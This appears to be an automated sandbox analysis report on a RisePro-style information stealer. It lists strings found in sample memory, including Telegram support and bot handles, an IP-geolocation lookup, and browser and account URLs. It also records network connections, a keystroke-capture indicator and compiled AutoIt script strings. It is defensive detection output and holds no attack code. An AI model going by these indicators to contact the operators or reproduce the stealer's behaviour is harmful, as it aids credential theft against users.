Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000188C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52u
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52lM
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E248B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2625392452.000001CA65298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF456000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CA6000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016/ee
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17/ewGpY
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 590971cd60.exe, 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.000000000137D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTr
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.52
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botI
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 590971cd60.exe, 00000014.00000003.2584100519.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2588756879.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2583846595.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585534722.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586892296.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2894808239.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582507104.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591446745.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585217441.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2580096642.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591019092.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2594404316.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2595186539.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586353379.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2590241789.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581314601.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/f
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 590971cd60.exe, 00000014.00000003.2584100519.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2588756879.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2583846595.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585534722.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586892296.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2894808239.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582507104.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591446745.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585217441.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2580096642.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591019092.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2594404316.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2595186539.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586353379.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2590241789.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581314601.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/index
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/r
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687568679.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2672235494.0000000003D8E000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2670877909.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2683839052.0000000003E19000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690904429.0000000003E31000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2672330452.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687145473.0000000003E2E000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775112265.0000000003B25000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775942820.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2813719721.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775888301.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2818935392.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775664992.0000000003B36000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2811449608.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account/t
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/t
Source: bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2818935392.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2811449608.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountn
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690945819.0000000003E47000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2686241340.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2683839052.0000000003E19000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687671932.0000000003E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountt
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49931 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: bad48ea9ac.exe, 0000000F.00000002.2689362746.0000000001593000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES memstr_ae6647e2-8

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c740df1c-c
Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ba9403ef-e
Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_15eca3eb-4
